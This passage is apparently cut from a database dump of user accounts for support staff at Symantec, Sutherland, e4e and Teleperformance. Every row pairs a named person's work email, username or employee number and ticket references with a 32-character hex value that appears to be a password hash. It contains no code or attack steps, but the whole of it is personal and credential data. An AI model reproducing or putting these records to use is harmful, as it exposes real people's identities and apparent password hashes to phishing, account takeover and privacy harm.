e4e,c7d26a16d038e17991d347d316ddd111,Selvaraj,<blank>,Chandru_Selvaraj,Chandru,N
ULL,NULL,NULL
2444-40a4-bc7e-2c6f313202f1,<blank>,<blank>,tools_id@symantec.suth.com,Sutherlan
d,410701e643b3e01884aaf23f542cb812,KumarP,<blank>,099905,Santosh,NULL,NULL,NULL
37-42b8-8638-ac629d83763c,<blank>,<blank>,Biju.sreeni@symantects.chnts.e4e.com,e
4e,ca3e3a60b0177c392f33505d68cdfbba,Sreeni,<blank>,Biju_Sreeni,Biju,NULL,NULL,NU
LL
bb17-4716-a10e-7c46b83e5e85,"CRQ000000609246 CLNP Mar 28,2012",000-0000,tools_id
@symantec.suth.com,Sutherland,dadaa8c448d463a740d76ddd6a3272f1,B,<blank>,074553,
Kameshwaran,NULL,NULL,NULL
5a-4681-9ca1-90d8aab2b194,<blank>,<blank>,karthikeyan.v@symantec.ts.e4e.com,e4e,
7d3ba6f173bcf5f8a0112f562e010a67,v,<blank>,Karthikeyan_v,Karthikeyan,NULL,NULL,N
ULL
97-4e96-ae4d-015b5322ac45,<blank>,<blank>,rajgopal.rangarajan@chnts.e4e.com,e4e,
879c0142c077a227e9f0b6824d933a8a,Rangarajan,<blank>,Raj_Gopal_Rangarajan,Raj Gop
al,NULL,NULL,NULL
3236-4c9f-8db7-296a7ac41fb3,"CRQ000000730985 CLNP July 16,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,75d15f8952689eeb1a89adfe892073d4,Sayed,<blank
>,224619,Zubair,NULL,NULL,NULL
4d-4f41-babb-d00b04d910e8,<blank>,<blank>,john.alexander@chnts.e4e.com,e4e,336d3
b18195b6063333b9e3d431e80d1,Alexander,<blank>,John_Alexander,John,NULL,NULL,NULL
ea84-4f64-938b-83fe493700af,<blank>,<blank>,Steven.Wiertz@teleperformance.nl,PM
- 5/7/2012 - CRQ000000650194,f4130e2b3ae7439985b07e6710058815,Wiertz,<blank>,224
459,Steven,NULL,NULL,NULL
b8f0-483b-8dd7-43590fbe4908,CRQ000000598382--vmd--21/03/2012,000-000,annalisa_co
nsultado@Suth.com,Sutherland,20fd103c6fe3a060e4f4f3068ffb637b,Consultado,<blank>
,222519,Annalisa,NULL,NULL,NULL
e5-4df3-a780-c96e905627a3,<blank>,<blank>,amrut.vasant@symantec.ts.e4e.com,e4e,1
1a4168e9493c1ebf3b115bcc3dd8a3b,Bettegeri,<blank>,Amrut_Vasant_Bettegeri,Amrut V
asant,NULL,NULL,NULL
fd-457f-b00a-5f66f3ca6f29,<blank>,<blank>,karthikeyan.k@ts.e4e.com,e4e,0ead71a14
04cb5d2d47fd3f6905b5845,Kuppuswamy,<blank>,Karthikeyan_K_Kuppuswamy,Karthikeyan
K,NULL,NULL,NULL
03be-4ccb-9632-a80c06170dc6,CRQ000000374297-CLNP-26/10/2011,000-0000,Prakash_D@s
ymantec.com,Symantec,36a8baab6e4b374496fd2d6f16373a27,D,<blank>,121235,Prakash,N
ULL,NULL,NULL
e8-48b0-bafb-5a88bac1c5cf,<blank>,<blank>,vasu.v@symantec.ts.e4e.com,e4e,1f18ceb
6ff8310f67d07eae8338b8dd6,Vangapattu,<blank>,Vasu_Vangapattu,Vasu,NULL,NULL,NULL
a72d-4046-b1e1-15c659c426f5,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,f688a34b0aad5e8e98d4938048fdbefd,Nakka,<blank>,venkata_nakka_cc,Venkata,N
ULL,NULL,NULL
bb66-4ad1-a7bd-fdaef0e17a5a,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,be5da8d925941ff1936c24588711fa03,Olsen,<blank>,085688,Peter ,NULL,NULL,NULL
7a-4172-89fd-c3a8612ffb62,<blank>,<blank>,sunil.kurup@symantec.ts.e4e.com,e4e,19
d7305cc3db98b46800cecc9990ef84,Kurup,<blank>,Sunil_K_Kurup,Sunil K,NULL,NULL,NUL
L
eeba-4eeb-b36a-1a416efcf8a9,<blank>,<blank>,stevencharles_ayllon@SPI.COM,PM - 8/
28/2012 - CRQ000000783669,9193f728faac248a7f044b390ce5e17e,Ayllon,<blank>,229454
,Steven Charles,NULL,NULL,NULL
3a-41e3-ae45-926631bbc2b4,<blank>,<blank>,rakesh.dt@symantec.ts.e4e.com,e4e,8e39
0cfd8bbcf96f34ca9c61796be04f,DT,<blank>,Rakesh_DT,Rakesh,NULL,NULL,NULL
7c-4825-86d0-c3db873871fe,<blank>,<blank>,nithyananthan.v@symantec.ts.e4e.com,e4
e,0d46bca9fb53e8fa8596f768cd1dc02f,Veerappan,<blank>,Nithyanantham_Veerappan,Nit
hyanantham,NULL,NULL,NULL
c72d-4030-9c51-57a6bdf9c782,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,b6dc733a0fc6ee9be27202890688a9f2,Parteira,<blank>,085725,Alex,NULL,NULL,NULL
e5-49df-b4d7-ca3589f06fcb,<blank>,<blank>,manju.hemanathan@symantec.ts.e4e.com,e
4e,0ec5f0028f65a13af5640a03a55c34a0,Hemanathan,<blank>,Manju_Hemanathan,Manju,NU
LL,NULL,NULL
92f5-4df0-8c63-ca3cc489a9e6,<blank>,<blank>,W_jing@neusoft.com,<blank>,aa99d1344
58d05ceab00b626ad37b8df,wang,<blank>,076384,jing,NULL,NULL,NULL
33-4880-bea9-05b0a96fa649,<blank>,<blank>,kamesh.para@symantec.ts.e4e.com,e4e,c2
634f8bc18cf19f29eda699631b3e96,Para,<blank>,Kamesh_Para,Kamesh,NULL,NULL,NULL
21a4-49c1-b1b9-f3003cb7979e,bpr,INC000000066985,tools_id@symantec.suth.com,suthe
rland,3cf0611a1e10b5cd069dbe3b9a9f8fa4,K,<blank>,086086,Arun,NULL,NULL,NULL
fd-48a0-b266-702b7e9c6ff0,<blank>,<blank>,raghuraman.b@symantec.ts.e4e.com,e4e,1
cae15daa80448c40fadffb525fde6b3,Balaraman,<blank>,Raghuraman_Balaraman,Raghurama
n,NULL,NULL,NULL
39-4be3-b660-e7895641c6d8,<blank>,<blank>,smruti.sushmaya@ts.e4e.com,e4e,a21b79a
dc3588411490c8aecd2dda0ba,Sushmaya,<blank>,Smruti_Sushmaya,Smruti,NULL,NULL,NULL
7890-48f0-ad25-8eb5156de4ab,CRQ000000621079 SP 9 April 2012,000-0000,Jayshri_Pil
lai@symantec.suth.com,Sutherland,83ac316819345eb6e475aa5d319ff198,Pillai,<blank>
,223019,Jayshri,NULL,NULL,NULL
36-4990-b57b-d21f6b6889b7,<blank>,<blank>,prasad.kulkarni@symantec.ts.e4e.com,e4
e,e359263c8cf4fce8a687616243ab890a,Kulkarni,<blank>,Prasad_Kulkarni,Prasad,NULL,
NULL,NULL
a5-4d03-84cb-266098533323,<blank>,<blank>,sujeesh.s@symantec.ts.e4e.com,e4e,065c
9316876bb1bb3db9b3dfac39420d,S,<blank>,Sujeesh_S,Sujeesh,NULL,NULL,NULL
8e-4aef-a30b-45c23ce41ef1,<blank>,<blank>,karthick.v@symanteccs.chnts.e4e.com,e4
e,1225dbc1270272d0473476855e293107,V,<blank>,Karthick_V,Karthick,NULL,NULL,NULL
c6b4-4234-bd9f-4ad657873658,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,d03570482f83ebad939a8a3bb0539c94,Murray,<blank>,085726,Daniel,NULL,NULL,NULL
42b4-4547-b53c-4e8c5d55bc01,"CRQ000000829982 CLNP Oct 08,2012",000-0000,jorge_fe
lismino@symantec.com,Symantec,18c330b03dfde84d652345bbefe6cace,Felismino,<blank>
,230583,Jorge,NULL,NULL,NULL
60c0-4ff4-b781-e98d33e4f214,CRQ000000622720 SP 10 April 2012,000-0000,Mridul_Sin
ha@symantec.suth.com,Sutherland,99bd92e9f1760e846a35073a0dd434e8,Sinha,<blank>,2
23553,Mridul,NULL,NULL,NULL
20b9-416a-b5e8-d00be5ad1e41,CRQ000000624201--vmd--11/04/2012,<blank>,ftzortzakos
@symantec.teleperformance.gr,Teleperformance,bf118c5e69ce467c8ad64f21e8314f12,Tz
ortzakos,<blank>,223744,Fivos,NULL,NULL,NULL
5a-47b7-b594-fc4e3ca14075,<blank>,<blank>,arockia.a@symantects.chnts.e4e.com,e4e
,029a588c7095233782b8f333e21b3d95,A,<blank>,Arockia_A,Arockia,NULL,NULL,NULL
47-4176-9bee-1cf906edb4e9,<blank>,<blank>,arun.gantayat@symanteccs.chnts.e4e.co,
e4e,d36b7942aec1b4b05e6a5ec8bcde66f3,Gantayat,<blank>,Arun_Gantayat,Arun,NULL,NU
LL,NULL
d1-4d52-86b2-e073ac8e7436,<blank>,<blank>,kowsalya.palani@symantects.chnts.e4e.,
e4e,0aafb823d5b78e637bc8346f2c239647,Palani,<blank>,Kowsalya_Palani,Kowsalya,NUL
L,NULL,NULL
ce-4a25-8e83-0ce428ecb033,<blank>,<blank>,sudha.vellingiri@symantects.chnts.e4e,
e4e,9067f7803211ffb1d415ca133805b72a,Vellingiri,<blank>,Sudha_Vellingiri,Sudha,N
ULL,NULL,NULL
a9-4561-b064-123de1bbb76f,<blank>,<blank>,rajapriyaa.devaraj@symantects.chnts.e,
e4e,f513bcfc5f300e2352f5d8f6eb80ba55,Devaraj,<blank>,Rajapriyaa_Devaraj,Rajapriy
aa,NULL,NULL,NULL
73-477b-9b34-24250aaebe4b,<blank>,<blank>,kavitha.neminathan@symantects.chnts.e,
e4e,4b0a46dc4cb433fc85b3bfb1cb0ddb6c,Neminathan,<blank>,Kavitha_Neminathan,Kavit
ha,NULL,NULL,NULL
d0-41ec-b5cb-9634840cbbdc,<blank>,<blank>,arunmohan.r@symantects.chnts.e4e.com,e
4e,7b3ec0dbb8252a24acefcdce0f77c0bf,R,<blank>,Arunmohan_R,Arunmohan,NULL,NULL,NU
LL
57-4009-bc6b-08436669c35c,<blank>,<blank>,bharaniraj.ashokaraj@symantects.chnts,
e4e,148bb20d98d72a4251586265e197f2a7,Ashokaraj,<blank>,Bharaniraj_Ashokaraj,Bhar
aniraj,NULL,NULL,NULL
f6-42da-8324-1075bdbaee75,<blank>,<blank>,ashok.muniyandi@symantects.chnts.e4e.,
e4e,668fc4550a74d6e7a1e9cca4b44f816f,Muniyandi,<blank>,Ashok_Muniyandi,Ashok,NUL
L,NULL,NULL
a9-4f1a-ac0d-0f4d0d1b7c4e,<blank>,<blank>,akilan.venkatesan@symantects.chnts.e4,
e4e,e2c9988fe5004fd24246118896bd189e,Venkatesan,<blank>,Akilan_Venkatesan,Akilan
,NULL,NULL,NULL
03-4ec3-a63c-d7f819e8c89c,<blank>,<blank>,wilson.alexender@symantects.chnts.e4e,
e4e,b02b0f13ad0fc5d5799693ed95ebb061,Alexander,<blank>,Wilson_Alexander,Wilson,N
ULL,NULL,NULL
a7-4df2-b777-2d3120a415dc,<blank>,020861,ming_chai@symantec.com,Symantec,c03079f
beec50cd4754510179fa85a24,Chai,<blank>,ming_chai,Ming,NULL,NULL,NULL
11-4ccc-a075-4516c616ae2d,<blank>,<blank>,archana_sridhar@symantec.com,Symantec,
9f81f45cb3affb7eaac7be3d5a0ee168,Sridhar,<blank>,archana_sridhar,Archana,NULL,NU
LL,NULL
fe-4f39-bca9-7691730dc55b,<blank>,<blank>,Narendra_Sinha@suth.com,Sutherland,e62
0fd30b6752bcf888a42472871c001,Sinha,<blank>,narenda_sinha,Narenda,NULL,NULL,NULL
3644-40d3-be76-e367fa3925e9,CRQ000000598387--vmd--21/03/2012,000-000,lauricegrac
e_corpuz@Suth.com,Sutherland,0052782dd690ab8eb1a5d6dba2391ce5,Corpuz,<blank>,222
521,LauriceGrace,NULL,NULL,NULL
b2-4bef-980e-7fc5a4e9a0df,<blank>,<blank>,jshan@suth.com,Sutherland,ab481af8b8d3
3be5d65e3d8f65c38678,Maheshwaren,<blank>,muthu_maheshwaren,Muthu,NULL,NULL,NULL
94-4c56-ba62-f476b702f01e,<blank>,<blank>,Ananth_Rajagopalan@SUTH.COM,Sutherland
,58f0a0baac52adc7efec5f615d34be1e,Rajagopal,<blank>,ananth_rajagopal,Ananth,NULL
,NULL,NULL
df-48e2-9fd3-5fe9c983bdc4,<blank>,<blank>,Nivas_Rajasekaran@suth.com,Sutherland,
de2e94beef3c28d745057418abd43562,Raja,<blank>,nivas_raja,Nivas,NULL,NULL,NULL
6a08-4bf0-8c2d-39c306d4ca33,CRQ000000272462--VMD--07/06/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,433a38b4726a8576c7a17d44066aa59f,Balisalisa,<blank>,1
16894,Christopher Ramos,NULL,NULL,NULL
0a17-4c18-a854-9891cd29a4b9,SSS 17/12/09,EMPROV,tools_id@symantec.suth.com,Suthe
rland,9cd5886446756f51adb07a03ce85be6c,Beck,<blank>,niman_beck_cc,Niman,NULL,NUL
L,NULL
18-4913-a216-ceabd0f86061,<blank>,<blank>,Premkant_P@SUTH.COM,Sutherland,5bcfa25
ce5144da7f228ff2155cf263f,Kanth,<blank>,prem_kanth,Prem,NULL,NULL,NULL
f9-4942-9fbe-1c9bc09e6978,<blank>,<blank>,Jaideep_Sethia@suth.com,Sutherland,728
e31702b9a9547b43b0c3cd23f8530,Jaideep,<blank>,jaideep,Jaideep,NULL,NULL,NULL
cb-4bbe-990b-dfd1c65a509f,<blank>,<blank>,MRMythun@suth.com,Sutherland,f9e8e0447
c6b682860a8944d8fc628f9,Mythunni,<blank>,mohammed_mythunni,Mohammed,NULL,NULL,NU
LL
32f9-4cbc-ab72-08379e10079d,nam-08-12-2010,CRQ000000106961,nh.symantec@teleperfo
rmance.com.ar,Teleperformance Argentina,762383e37cb8dc7c41084dacc0c9f7c7,Marello
,<blank>,107958,Juan Martin ,NULL,NULL,NULL
d0-4bb3-aa98-630f5a65bbc4,<blank>,<blank>,Deepak_Ganesh@suth.com,Sutherland,16db
7e3674bed4bd3da59a011d381533,Ganesh,<blank>,deepak_ganesh_k,Deepak,NULL,NULL,NUL
L
7e-486a-a27f-4eaddbc4c516,<blank>,<blank>,Arthur_Soans@suth.com,Sutherland,99e60
7cd3cb0403ecea3a0565d7521cf,Soans,<blank>,arthur_soans,Arthur,NULL,NULL,NULL
f677-4942-a565-ee314e694cf0,"CRQ000000609246 CLNP Mar28,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,f056a619036f5d990a55d63ecd02b600,Harikrishnan,<
blank>,222398,Shrikant,NULL,NULL,NULL
a1-4e2b-985b-be4197bdfd66,<blank>,<blank>,Fardeen_Ikrami@SUTH.COM,Sutherland,c31
c74840c132b668a67c56eb008c20e,Ikrami,<blank>,fardeen_ikrami,Fardeen,NULL,NULL,NU
LL
28-4371-a88a-f36345a57bd5,<blank>,<blank>,VJManan@suth.com,Sutherland,42ce45adcb
0cb99312d98e7adf005af0,Vaidya,<blank>,manan_vaidya,Manan,NULL,NULL,NULL
b4-41fa-b7e9-214bd32a9893,<blank>,<blank>,robert_mason@symantec.com,Symantec,e41
57c866a623ab76a7532978a649535,Mason,<blank>,bob_mason,Robert,NULL,NULL,NULL
af-4bd9-9ee2-04aad551bd46,<blank>,<blank>,chris_elliott@symantec.com,Symantec,2b
3042e60e8b40161bdbc13eed6ab578,Elliott,<blank>,chris_elliott,Chris,NULL,NULL,NUL
L
1e-4420-b5fd-4586d74e1416,<blank>,<blank>,jake_plahn@symantec.com,Symantec,9d0b8
9c7316274b8fd1576d2291fd444,Plahn,<blank>,jake_plahn,Jake,NULL,NULL,NULL
e0f0-4c4a-9d8d-1715012fb51c,"CRQ000000602153 CLNP Mar22,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,ca6e936fe06a21f9dad1fa2305935ff3,Medina,<blank>
,222569,DavidPayne,NULL,NULL,NULL
72-4c4b-9a48-64fe098b65e2,<blank>,<blank>,tamara_harris@symantec.com,Symantec,bc
e739cd09f492dfc219bd988273baf6,Harris,<blank>,tamara_harris,Tamara,NULL,NULL,NUL
L
42-4a6d-b0f5-80a8778a06ea,<blank>,<blank>,jshan@suth.com,Sutherland,785ebc13804e
62bbffc5d05a025df5ae,Shanawaz,<blank>,shanawaz,Shanawaz,NULL,NULL,NULL
48-451f-8483-3a175a9d6738,<blank>,<blank>,bnugent@symantec.com,Symantec,340a17f3
00f7823f10ed6cb8390eeeda,Latent,<blank>,cms_latency,CMS,NULL,NULL,NULL
04-481e-8f3d-c6fe980bf2b8,<blank>,074193,Aamir_Shams@SUTH.COM,Sutherland,dca6b6c
781b3022384c0c5860992a3fe,Shams,<blank>,Aamir_Shams,Aamir,NULL,NULL,NULL
6fe-48d1-9a64-ac4275975161,<blank>,012316,vallie_majors@symantec.com,Symantec,44
3292702115514bfcc6f1c42165d212,Majors,<blank>,vallie_majors,Vallie,NULL,NULL,NUL
L
b6b8-4679-955f-bf1adf4ba8fb,CRQ000000603563--vmd--23/03/2012,000-000,nikki_apoli
nario@Suth.com,Sutherland,0d3d9f7a0b26a9dedfb2b8870b6407fb,Apolinario,<blank>,22
2652,Nikki,NULL,NULL,NULL
2a8c-4e79-b158-32c228331883,"CRQ000000669847 CLNP May 23,2012",000-000-0000,tool
s_id@symantec.suth.com,Sutherland,acbc2f185ea2215ee4c06b6b766bf03e,Dias,<blank>,
225893,Rawlin,NULL,NULL,NULL
6a-4ca3-9397-c27896e838bc,<blank>,074231,Abbas_Sayed@SUTH.COM,Sutherland,463f6ba
740553eeea6c8af4a66f68781,Sayed,<blank>,Abbas_Sayed,Abbas,NULL,NULL,NULL
0d5-4bd7-bd8b-16e67a62f8ea,<blank>,082377,heiko_sanner@symantec.com,Symantec,65c
1b2799a62955df1f661177e3d00f3,Sanner,<blank>,heiko_sanner,Heiko,NULL,NULL,NULL
e2ce-4909-bc03-f4f673b538b1,CRQ000000603302--vmd--23/03/2012,000-000,sheila_belz
a@Suth.com,Sutherland,e059bae0531ad7c5aef746a954c28c12,Belza,<blank>,222654,Shei
la,NULL,NULL,NULL
387-4edc-83c9-324ed16f4e35,<blank>,<blank>,deperri@symantec.com,Symantec,ec9079c
701d63eb2b7a2b1c1bc0a7252,Perri,<blank>,deborah_perri,Deborah,NULL,NULL,NULL
0205-443b-a192-3191982eef25,INC213497,nam 07/16/2010,tools_id@symantec.suth.com,
Sutherland,50f20282a4ccea34d040856d1b19c5b6,Pereira,<blank>,075801,Jeffrey,NULL,
NULL,NULL
e68-4343-98bc-7b32e374dca9,<blank>,081267,symantec_2nd_maa@tp-tec.nl,TPH,35a7dfc
6c61b96e433ce6196661a7efc,Streich,<blank>,thorsten_streich,Thorsten,NULL,NULL,NU
LL
014-40bf-89c4-a7dc0b159db8,<blank>,0035318617418,Matti_Bjork@symantec.com,Symant
ec,efe1548c149b24dca40a340f8a9c49f5,Matti Bjork,<blank>,Matti_Bjork,Matti Bjork,
NULL,NULL,NULL
eac0-4fcf-8100-42a07869ea66,CRQ000000603318--vmd-23/03/2012,<blank>,raymund_berg
antios@Suth.com,Sutherland,7b07a8e6b639071ad5b9df700cb59e89,Bergantios,<blank>,2
22656,Raymund,NULL,NULL,NULL
6b55-47bd-abc1-5bb9f74dd0b6,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,ce477adb507aa272f1e48ec52371bb87,A D,<blank>,075286,Vidhya,NULL,NULL,NULL
dc3a-45e9-83bd-16ee73a99ddc,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,f97268997b54cf52538f39b9fc4a4479,J,<blank>,075356,Saranya,NULL,NULL,NULL
55-4d24-8023-1f724f3033e1,<blank>,<blank>,Abdulla_A@SUTH.COM,Sutherland,e4ed7c48
a0dd54e1b940e50ee000b208,A,<blank>,Abdulla_A,Abdulla,NULL,NULL,NULL
ba-4175-97bb-c4727d2fcce0,<blank>,<blank>,Abdullah_Mahapule@SUTH.COM,Sutherland,
96dc990fa416b3ace46ece32a74b7e7b,Mubarak,<blank>,Abdullah_Mubarak_Mahapule,Abdul
lah,NULL,NULL,NULL
b2-4233-b1d6-05207bea74c1,<blank>,<blank>,VDAbhije@suth.com,Sutherland,cb12d4ef5
9e39b32e50681014d84cf3d,Dinesh,<blank>,Abhijeet_Dinesh_Vyas,Abhijeet,NULL,NULL,N
ULL
07-47b1-a533-ced2d2eb7b74,<blank>,<blank>,BSAbhije@suth.com,Sutherland,f6d830360
403123796512e5df9c36698,Subrata,<blank>,Abhijeet_Subrata_Bhowmick,Abhijeet,NULL,
NULL,NULL
ea-43c8-8324-a1cb3fcc893c,<blank>,<blank>,Abhijith_MJ@SUTH.COM,Sutherland,386bce
738645a91a8223b9575b1472a7,M,<blank>,Abhijith_M_J,Abhijith,NULL,NULL,NULL
f5c8-49be-9170-bdd83114b5cb,CRQ000000632409--vmd--19/04/2012,<blank>,eric_brasse
@teleperformance.com,Teleperformance,a3b3b176b4157ddd6e1583c29fbfc61f,Brasse,<bl
ank>,223978,Eric,NULL,NULL,NULL
21-402d-9c79-324f814a7bcb,<blank>,<blank>,kevin_kerwien@symantec.com,Monitoring,
7e2a432883f8f4c3586292d8be30c26d,None,<blank>,monitor,Monitoring,NULL,NULL,NULL
56-4995-a51c-34424c01f24a,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland,
0bdf0a1b433f25a9a925e6766bfa3b3b,Sundari,<blank>,Abirama_Sundari_Srikumar,Abiram
a,NULL,NULL,NULL
69b-4096-a82e-9c3995b9913a,<blank>,2614953,Tools_id@symantec.suth.com,Symantec,0
7eb1dd864707383f00708b9f0e5c746,Abellano,<blank>,xenia_abellano,Xenia,NULL,NULL,
NULL
44-4085-97d1-efd7050dbd62,<blank>,<blank>,Abu_AbrahamVJ@SUTH.COM,Sutherland,6670
c0c3f7f45a0d2917d7f505fde44f,Abraham,<blank>,Abu_Abraham_V_J,Abu,NULL,NULL,NULL
6c-49d0-92c5-25d8cb6c4886,<blank>,<blank>,Acharya_Sivalingam@SUTH.COM,Sutherland
,1137994f95bbd67d3d3606a1c81842bc,Lingesh,<blank>,Acharya_Lingesh_Sivalingam,Ach
arya,NULL,NULL,NULL
49-4175-8189-a8f13fb33d7d,<blank>,<blank>,AchintoAnjan_Mazumdar@SUTH.COM,Sutherl
and,430586b3ba08171948dcfc2f624ed9a9,Anjan,<blank>,Achinto_Anjan_Mazumdar,Achint
o,NULL,NULL,NULL
41-479b-abfc-8ef8c772dad8,<blank>,<blank>,Adarsh_M@SUTH.COM,Sutherland,599a72100
19dbdb439706723a44e01bf,T,<blank>,Adarsh_T_M,Adarsh,NULL,NULL,NULL
84-46b1-94e3-a9ac1a72301e,<blank>,<blank>,Adel_Ibraham@SUTH.COM,Sutherland,a1284
bc814d9570d767b1241539d9123,Ibraham,<blank>,Adel_Ibraham,Adel,NULL,NULL,NULL
21-4fea-a3a0-4577ed586671,<blank>,<blank>,Adwitiya_M@SUTH.COM,Sutherland,741e4b3
42b9188e9aa9174f71a339838,M,<blank>,Adwitiya_M,Adwitiya,NULL,NULL,NULL
de-4437-b4ac-410279e4a608,<blank>,<blank>,Aiby_M@SUTH.COM,Sutherland,0628aebe53d
5c47d5123449e40c3de8b,Abraham,<blank>,Aiby_Abraham_M,Aiby,NULL,NULL,NULL
a4-462b-981e-21550a9df308,<blank>,<blank>,Aijaz_Shaikh@SUTH.COM,Sutherland,ce0c7
a641ca274370dc307d70c270619,Wahid,<blank>,Aijaz_Wahid_Shaikh,Aijaz,NULL,NULL,NUL
L
29-4abf-94ab-3ac5e810cc73,<blank>,<blank>,Aiswarya_Radhakrishnan@SUTH.COM,Suther
land,9c1610d813bac3a7a2fb16c7b282b363,Radhakrishnan,<blank>,Aiswarya_Radhakrishn
an,Aiswarya,NULL,NULL,NULL
ca8a-46d9-aaa4-5553d2a195c4,"CRQ000000636895 CLNP April 23,2012",000-0000,tools_
id@symantec.suth.com,Sutherland,649be5309ce3d740da6e379948af1e63,Acosta,<blank>,
125290,Lou Belle,NULL,NULL,NULL
35-4bd0-9b6e-a20582633262,<blank>,<blank>,Ajay_Baidya@SUTH.COM,Sutherland,cc00de
eed86c66c40977531d6e6d425b,Baidya,<blank>,Ajay_Baidya,Ajay,NULL,NULL,NULL
41-40eb-bf40-bb8fb7c84901,<blank>,<blank>,Ajay_Sanjith@SUTH.COM,Sutherland,9047d
7f02f8d8eef2f0888871620a6b3,Krishna,<blank>,Ajay_Krishna_Sanjith,Ajay,NULL,NULL,
NULL
28-43be-9fbf-e1b1cd7dce9c,<blank>,<blank>,Ajay_Prabhakar@SUTH.COM,Sutherland,a74
51b656db8aa531f6fb6cd09330c0b,Prabhakar,<blank>,Ajay_Prabhakar,Ajay,NULL,NULL,NU
LL
a5-43c5-91b3-f9e350ceecbc,<blank>,<blank>,Ajay_Rajeswaran2@SUTH.COM,Sutherland,3
fbd2263f8378ebf61d9498327e866cc,Rajeswaran,<blank>,Ajay_Rajeswaran,Ajay,NULL,NUL
L,NULL
39-4c40-82c5-65d221c50683,<blank>,<blank>,Ajay_Thakur@SUTH.COM,Sutherland,3f502e
45338e70b7997c67d708e9f156,Thakur,<blank>,Ajay_Thakur,Ajay,NULL,NULL,NULL
6f-48c1-b5a9-191d38f0a6bb,<blank>,<blank>,AjinaChandran_R@SUTH.COM,Sutherland,ee
b373e4847349fa7053ed2544eed0a4,Chandran,<blank>,Ajina_Chandran_R,Ajina,NULL,NULL
,NULL
11-42fc-bd30-fe245b65845f,<blank>,<blank>,Ajish_Puthanthara@SUTH.COM,Sutherland,
a75a10611ee61a5eec2ee3a5285d5f12,Chandran,<blank>,Ajish_Chandran_Puthanthara,Aji
sh,NULL,NULL,NULL
84c3-4b2c-b4f4-ef20ae533898,<blank>,<blank>,bautista_nino@suth.com,CT - 17/07/20
12 - CRQ000000734296,91af30ccccdae3be2962eb5cad9682f3,Nino,<blank>,228060,Bautis
ta,NULL,NULL,NULL
01-46b4-b25e-b6f0a4fb9d47,<blank>,<blank>,AjitSingh_U@SUTH.COM,Sutherland,c89f49
33ea2a50e20026c532a3346c8e,Singh,<blank>,Ajit_Singh_U,Ajit,NULL,NULL,NULL
ce-4d60-b39c-5cfe273c25d6,<blank>,<blank>,Ajith_Krishnan@SUTH.COM,Sutherland,685
273e8444098886c49c0fd02bb08ba,Krishnan,<blank>,Ajith_Krishnan,Ajith,NULL,NULL,NU
LL
eb-4523-b9da-4cc8399191c0,<blank>,<blank>,Ajith_B@SUTH.COM,Sutherland,cc8c6a8363
0cf1b2099df8def34ffbe3,Kumar,<blank>,Ajith_Kumar_B,Ajith,NULL,NULL,NULL
1e-4e30-be20-39e14d721412,<blank>,<blank>,Ajith_Sunny@SUTH.COM,Sutherland,17da92
4846e4e39724c5a48c08afd334,Sunny,<blank>,Ajith_Sunny,Ajith,NULL,NULL,NULL
94-4a8b-9b0d-c3f3d032ed32,<blank>,<blank>,AjnabiLahari_Biswas@SUTH.COM,Sutherlan
d,4332922b5e872ae01b0c3caa46412160,Lahari,<blank>,Ajnabi_Lahari_Biswas,Ajnabi,NU
LL,NULL,NULL
d3-4db8-a023-db4d9e207897,<blank>,<blank>,Akash_Goni@SUTH.COM,Sutherland,7ea09d5
f57681559886132eee30dee76,Vasant,<blank>,Akash_Vasant_Goni,Akash,NULL,NULL,NULL
91-4199-b3f5-3d1600f1c97e,<blank>,<blank>,vikram_kamalanathan@suth.com,Sutherlan
d,27173f071cb5bdaa6a3de58bb5f43074,Singh,<blank>,vikram_singh,Vikram,NULL,NULL,N
ULL
eb-46c8-b483-250ac922be3b,<blank>,<blank>,Jithesh_Gangadharan@SUTH.COM,Sutherlan
d,6b02ff1cdf504e51eb699ff37b7e37a1,Jithesh Kumar,<blank>,jithesh_kumar,Jithesh K
umar,NULL,NULL,NULL
0a-4686-935d-f3d983c828e9,<blank>,<blank>,Keshav_KM@SUTH.COM,Sutherland,02cbcc18
12eb99caaeb0f0b7f7e1eb25,K.M.,<blank>,keshav_km,Keshav,NULL,NULL,NULL
ea-42cf-894b-5ce9a80fc1c2,<blank>,<blank>,Rathna_Kalidas@suth.com,Sutherland,0da
0966644cb32627b377506c8954ac9,Kalidas,<blank>,ratna_kalidas,Ratna,NULL,NULL,NULL
0d-4d91-92a8-822d677e4399,<blank>,<blank>,Rangachary_Krishnan@SUTH.COM,Sutherlan
d,6e6cad7ab11a4b9cccbeab546fe0fbb7,RangaChary,<blank>,rangachary,RangaChary,NULL
,NULL,NULL
bc-4de0-9c6c-d03b3d3d293b,<blank>,<blank>,Balaji_M3@SUTH.COM,Sutherland,eec0df68
555cc5ee96db0ef1925839ea,M,<blank>,balaji_m,Balaji,NULL,NULL,NULL
02-4f5b-91fc-aa818e9a6b69,<blank>,<blank>,Sarvesh_Subramani@suth.com,Sutherland,
54558dcab51e3d103fa8ef95155c9098,Subramani,<blank>,sarvesh_subramani,Sarvesh,NUL
L,NULL,NULL
94-47e3-a0ec-7b40c45f4031,<blank>,<blank>,Abhishek_Pandey@SUTH.COM,Sutherland,31
e33543d1826ecb3561d912a03d9324,Pandey,<blank>,Abhishek_Pandey,Abhishek,NULL,NULL
,NULL
1e1-4200-b33d-631eae5c7646,<blank>,INC000000050437,accounts@symantec.teleperform
ance.gr,TPG,58bf59ccc482d674b50ba4146cd4d8ba,Ngoie Wa Ngoie,<blank>,frank_ngoiew
angoie,Franck,NULL,NULL,NULL
32-4767-9427-273def904038,<blank>,<blank>,Abhishek_Rajeshwaran@SUTH.COM,Sutherla
nd,b96e8fc50f96182785ab44f001790dd0,Rajeshwaran,<blank>,Abhishek_Rajeshwaran,Abh
ishek,NULL,NULL,NULL
2f-4883-9a65-25f9b304e11a,<blank>,<blank>,Adnan_Baliwala@SUTH.COM,Sutherland,3b5
3c753aec3f8ac7f8d0c86b14e31e5,Baliwala,<blank>,Adnan_Baliwala,Adnan,NULL,NULL,NU
LL
